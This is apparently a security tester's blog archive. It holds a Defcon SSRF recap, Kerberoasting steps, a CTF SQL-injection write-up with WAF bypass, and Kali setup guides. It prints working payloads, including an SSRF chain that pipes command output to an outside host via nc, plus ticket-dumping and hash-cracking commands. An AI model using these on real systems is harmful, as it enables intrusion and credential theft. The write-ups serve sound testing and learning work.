Sunday, July 30, 2017

Defcon 25 Takeaways

This July I had the pleasure of attending the 25th anniversary edition of Defcon, and these are my take-aways from the conference.

My goal when going to Defcon is to get inspired and motivated by the great work of others and to be able to incorporate new ideas and techniques into existing work. There is a myriad of great work being presented or taught at Defcon and it is overwhelming to take it all in, especially when adding in the masses of people lining up and wandering around, making a semi-introvert wanna crawl back into bed.

Notable presentations:

This little gem presents techniques for finding and exploiting SSRF that are directly applicable when testing applications. By abusing the discrepancy between RFCs 2396 and 3986 in URL-parsing libraries, Orange Tsai has found that many libraries are vulnerable to these tricks in different situations. This results in payloads like the following:

http://foo@evil.com:80@google.com/
http://hackallthethings.xyz/－＊/etc/passwd
http://hackallthethings.xyz/ＮＮ/etc/passwd

Note that the hyphen and asterisk in the payloads are not the ASCII characters but the fullwidth unicode characters U+FF0D and U+FF0A, which end up as %0d and %0a and so break the NodeJS protection against CRLF injection; likewise the N in the last payload is U+FF2E, which ends up as a dot (%2e):

In Python:

>>> print(u'\uff0d')
－
>>> print(u'\uff0a')
＊
>>> print(u'\uff2e')
Ｎ
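As an added example (not from the talk or from this post), here is a small Python check that models the low-byte folding described above and flags URLs whose CR/LF, traversal dots or host ambiguity only show up after parsing; the function names and the allow-list are assumptions.

```python
# Added example: model the lossy code-point -> low-byte conversion that turns
# U+FF0D/U+FF0A into CR/LF and U+FF2E into '.', and flag URLs that rely on it.
import re
from urllib.parse import urlsplit


def low_byte_fold(s: str) -> str:
    """Model (assumption, not a library API) of a str->latin1 downgrade: each
    code point keeps only its low byte, so 0xFF0D -> 0x0D, 0xFF2E -> 0x2E."""
    return "".join(chr(ord(c) & 0xFF) for c in s)


def smuggled_controls(url: str) -> list:
    """Describe what appears only after folding, i.e. characters that look
    harmless as written but become CR/LF or '..' further down the stack,
    plus authorities with several '@' where parsers may disagree on the host."""
    folded = low_byte_fold(url)
    findings = []
    if any(c in "\r\n" for c in folded) and not any(c in "\r\n" for c in url):
        findings.append("CRLF appears only after folding")
    if ".." in folded and ".." not in url:
        findings.append("path traversal appears only after folding")
    if urlsplit(url).netloc.count("@") > 1:
        findings.append("more than one '@' in authority: parsers may disagree on the host")
    return findings


def is_safe_outbound_url(url: str, allowed_hosts: set) -> bool:
    """Allow-list gate for an SSRF-prone fetcher (assumed helper): reject
    non-ASCII and C0/DEL bytes before parsing, then pin the parsed host."""
    if not url.isascii() or re.search(r"[\x00-\x1f\x7f]", url):
        return False
    host = urlsplit(url).hostname
    return host is not None and host in allowed_hosts
```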

List of unicode characters here

Another example abuses the RFC 1035 escape handling in gethostbyname() (backslash quoting and \DDD decimal escapes):

>>> print host
\o\r\a\n\g\e.t\w
>>> socket.gethostbyname(host)
'50.116.8.239'

Orange also chained SSRF to exploit internal services via protocol smuggling and libraries vulnerable to CRLF injection.

Example:

http://0:8000/composer/send_email
?to=orange@chroot.org&url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/queries/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Acount%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB%07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A%06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult

There are tons of examples in this talk and I have yet to dig through them all and test them, but it’s definitely lots of stuff that will improve testing of SSRF and inspire new tricks and ideas.
There are also some good references in this talk:
SSRF Bible

All content is available at the Defcon Media Server.

Friday, June 23, 2017

Installing ASUS AWUS036NHA on Windows 10

Due to shoddy WiFi in my office I had to set up my computer with another adapter to try to get a better signal.

If you are on Windows 10, going to "Device management" and clicking "Update driver" is all it takes to get the drivers for this adapter.

Just like this blog post from Alfa Networks says:
http://alfanetworkinc.blogspot.dk/2015/08/blog-post.html

Monday, May 15, 2017

Springtime Kerberoasting

After getting some motivation from recent talks I attended, I decided to do some Kerberoasting in our Windows domain.

There are lots of excellent articles out there, such as Harmj0y’s article, which references a bunch of other good and original articles on the subject.
The reason I’m writing this blog post is that there are lots of tools out there, and some require specific versions of John the Ripper and so on, so I decided to document one path that I have taken.

First, on a domain joined Windows computer run the following script by Harmj0y:
https://gist.github.com/HarmJ0y/53a837fce877e32e18d78acbb08c8fe9

powershell -exec bypass

# Load the script
. ./Invoke-Kerberoast.ps1

# Do a test run to see
# that it's working
Invoke-Kerberoast | fl

# Get the tickets in John
# format and convert to CSV format
Invoke-Kerberoast -AdminCount -OutputFormat john | ConvertTo-Csv -NoTypeInformation | out-file kerberoasts.csv

The next step is to start cracking the tickets (in Kirbi format) that we obtained. We can use either John the Ripper or Hashcat. I decided on Hashcat as it can make use of the GPU (oclHashcat).

# -a 0 is the dictionary attack mode; -a 3 would treat rockyou.txt as a brute-force mask
hashcat -a 0 -m 13100 service_tickets_hashcat.txt rockyou.txt
# print the hashes already cracked into the potfile
hashcat -m 13100 service_tickets_hashcat.txt --show

Another option for doing this on a red team engagement is to use PowerShell Empire’s module for it, powershell/credentials/invoke-kerberoast.

Other tools and resources

https://github.com/nidem/kerberoast
https://room362.com/post/2016/kerberoast-pt1/
http://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/

Saturday, March 25, 2017

Simplesqlin

The server runs openresty/1.11.2.2 according to the response headers.

Injection point is here:
http://202.120.7.203/index.php?id=1*

We can add, subtract or multiply numbers:

http://202.120.7.203/index.php?id=2-1
http://202.120.7.203/index.php?id=2%2b1
http://202.120.7.203/index.php?id=2*1

By using order by we find the number of columns, which is 3; order by 4 gives a 500 error:

http://202.120.7.203/index.php?id=1%20order%20by%203--+

Anything else so far results in 500 errors.
There is a WAF blocking certain keywords. List of blocked keywords:
* SELECT
* FROM
* WHERE
* SLEEP

We can bypass the WAF by inserting a control character inside the keywords. Here we used %0b which is vertical tabulation.

http://202.120.7.203/index.php?id=2 uni%0bon+se%0blect 1,"a",3 order by 1--+

Other control characters that work in this case are:
* %0c
* %0E
* %0F
* %10 - %1f

So the WAF is relatively easily bypassed.
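As an added example (not part of the CTF or this writeup), here is a Python model of a keyword filter like the one described above beside a normalising version that strips the control bytes before matching, plus the integer parse that makes such a filter unnecessary; the function names are assumptions and the payloads are the ones shown in this post.

```python
# Added example: why a raw keyword match misses "uni%0bon se%0blect", and what a
# defender does instead (normalise before matching, or better, type the input).
import re
from urllib.parse import unquote_plus

BLOCKED = ("SELECT", "FROM", "WHERE", "SLEEP")  # the challenge's blocklist


def naive_waf_blocks(raw_param: str) -> bool:
    """Model (assumption) of the challenge's filter: case-insensitive keyword
    match on the URL-decoded value. A C0 byte inside a keyword evades it."""
    decoded = unquote_plus(raw_param)
    return any(kw in decoded.upper() for kw in BLOCKED)


def normalise(raw_param: str) -> str:
    """Decode, then remove the control bytes the backend ignored inside
    keywords (C0 range and DEL) and collapse whitespace before matching."""
    decoded = unquote_plus(raw_param)
    decoded = re.sub(r"[\x00-\x1f\x7f]", "", decoded)
    return re.sub(r"\s+", " ", decoded).upper()


def normalised_waf_blocks(raw_param: str) -> bool:
    """Same blocklist, applied to the normalised form: sees 'UNION SELECT'."""
    return any(kw in normalise(raw_param) for kw in BLOCKED)


def parse_numeric_id(raw_param: str):
    """The real fix: id is an integer, so accept only digits and bind the
    value as a query parameter instead of interpolating it into SQL."""
    m = re.fullmatch(r"\d{1,10}", unquote_plus(raw_param).strip())
    return int(m.group()) if m else None
```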

Now we need to find the table in which the flag is stored. Because I suck at remembering MySQL special tables and such, I used a resource like this:

MySQL Injection Cheat Sheet

Then we do a query like this:

http://202.120.7.203/index.php?id=2 uni%0bon+se%1flect table_schema,table_name,1 FR%0bOM information_schema.tables WHE%0bRE table_schema != 'mysql' AND table_schema != 'information_schema' order by 3--+

and find that there is a table called flag, duh.

And we can also get the column name in a similar fashion:

http://202.120.7.203/index.php?id=2 uni%0bon+se%1flect table_schema,table_name,column_name FR%0bOM information_schema.columns WHE%0bRE table_schema != 'mysql' AND table_schema != 'information_schema' order by 3 LIMIT 1 OFFSET 1--+

And then finally we can get the flag by doing this query:

http://202.120.7.203/index.php?id=2 uni%0bon+se%1flect flag,1,2 FR%0bOM flag order by 3--+
flag{W4f_bY_paSS_f0R_CI}

Monday, February 27, 2017

Blogging via Stackedit

How to

Add this to the top of the document:

---
layout: post
title: Blogging via Stackedit
tags: stackedit, reallycoolstuff, ingenious
---

Settings

Choose format to be HTML

Test

This is just a test to try out blogging in Markdown via Stackedit!
Let’s try some code:

def test():
    # print the numbers 0 to 999, one per line
    for x in range(1000):
        print(x)

Written with StackEdit.

Saturday, February 4, 2017

Installing Kali Linux Nethunter on Nexus 7 (2013 Wifi)

To install Nethunter on the Nexus 7 (Wifi 2013) edition we first need to unlock the bootloader of the device and root it. There are many guides on the Internet on how to do this, but the best source I have found so far is the Offensive Security Github repository: https://github.com/offensive-security/nethunter-LRT.

This repository contains a collection of scripts that help you install Kali Linux Nethunter on either a Nexus or OnePlusOne device. Their instructions are straightforward and their scripts are close to fully automated and work very well. It does require that you download a few things before using the scripts, but there are links that help you along.
The major advantage of these scripts over some other tools that I found is that they can run from Linux or OS X. First we must install Android Studio (or just the command-line binaries) to get ADB and fastboot. Next we must download and place the following into their respective folders in the cloned repo:

  • Stock Android image 
    • https://developers.google.com/android/images?hl=en#razor
  • Team Win Root Project (TWRP)
    • https://dl.twrp.me/flo/
  • SuperSU binary by ChainFire
    • http://download.chainfire.eu/752/SuperSU/BETA-SuperSU-v2.65-20151226141550.zip (this is the most shady part. I chose this as it was the only one that worked at the time)
  • Kali Nethunter image
    • https://www.offensive-security.com/kali-linux-nethunter-download/

Once these are in place we can go ahead and unlock the bootloader if it isn't already unlocked. Just run the script ./oemUnlock.sh.

Next we flash the stock Android image to have a clean device to install to. After installing, booting and setting up the device (manually), we can run the script that installs the Custom Recovery from TWRP, sets up the SuperSU binary to maintain root and installs Kali Linux Nethunter.

The last step requires us to select some things we want included in Kali Linux Nethunter, and then the installation proceeds.

If everything was successful we will have a working Nethunter device and we can go hack. Happy hacking. 

Thursday, January 19, 2017

Installing Kali Linux on Debian in DigitalOcean

DigitalOcean is a nice and relatively cheap way to run virtual machines in the cloud. As a pentester I like to use Kali Linux which comes with a great number of useful tools. The problem is that DigitalOcean does not have a Kali Linux droplet or a way of installing custom images, at least not to my knowledge. But since Kali Linux is based on Debian let's go ahead and try installing Kali Linux packages on top of the latest Debian image available from DigitalOcean.

We start by creating a droplet. I used the Debian 8.7 x64 distribution, and if you are gonna run Kali Linux you should probably go with at least size number 2, which has 1 GB of RAM at $10/month.

Add an SSH key to the droplet, spin it up and login to the box.

Let's find the sources for the Kali Linux packages from here:
http://docs.kali.org/general-use/kali-linux-sources-list-repositories

I wanna use the latest Rolling distribution, which gets updates continuously, so I'll use:
deb http://http.kali.org/kali kali-rolling main contrib non-free

We add this to the /etc/apt/sources.list file on the system.
root@mybox:~# echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list

cat /etc/apt/sources.list
...

# jessie-updates, previously known as 'volatile'
deb http://mirrors.digitalocean.com/debian jessie-updates main
deb-src http://mirrors.digitalocean.com/debian jessie-updates main
deb http://http.kali.org/kali kali-rolling main contrib non-free

Next we need to import the GPG key for the sources so that we can verify the packages. I looked up the key from an existing Kali Linux installation:

root@aKaliBoxIhad:~# apt-key list --with-fingerprint
...
/etc/apt/trusted.gpg.d/kali-archive-keyring.gpg
-----------------------------------------------
pub   rsa4096 2012-03-05 [SC] [expires: 2018-02-02]
      44C6 513A 8E4F B3D3 0875  F758 ED44 4FF0 7D8D 0BF6
uid           [ unknown] Kali Linux Repository <devel@kali.org>
sub   rsa4096 2012-03-05 [E] [expires: 2018-02-02]

Next we add the key to the keyring by fetching it from keys.gnupg.net. Note: do not use the short fingerprint!

root@mybox:~# apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys ED444FF07D8D0BF6
Executing: gpg --ignore-time-conflict --no-options --no-default-keyring --homedir /tmp/tmp.T551SpCEIH --no-auto-check-trustdb --trust-model always --primary-keyring /etc/apt/trusted.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
gpg: requesting key 7D8D0BF6 from hkp server keys.gnupg.net
gpg: key 7D8D0BF6: public key "Kali Linux Repository " imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

Now update the packages and let's look at which Kali Linux packages we can install:
root@mybox:~# apt-get update && apt-get upgrade

All the Kali Linux meta packages are listed here:

So for instance to install the top 10 tools of Kali Linux, we do:
root@mybox:~# apt-get install kali-linux-top10

Now we will have, among other tools, Metasploit installed on the server. Let's start it up:

root@mybox:~# /etc/init.d/postgresql start

root@mybox:~# msfdb init

root@mybox:~# msfconsole


                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.14-dev                         ]
+ -- --=[ 1613 exploits - 915 auxiliary - 279 post        ]
+ -- --=[ 471 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >


Now we can get hacking :D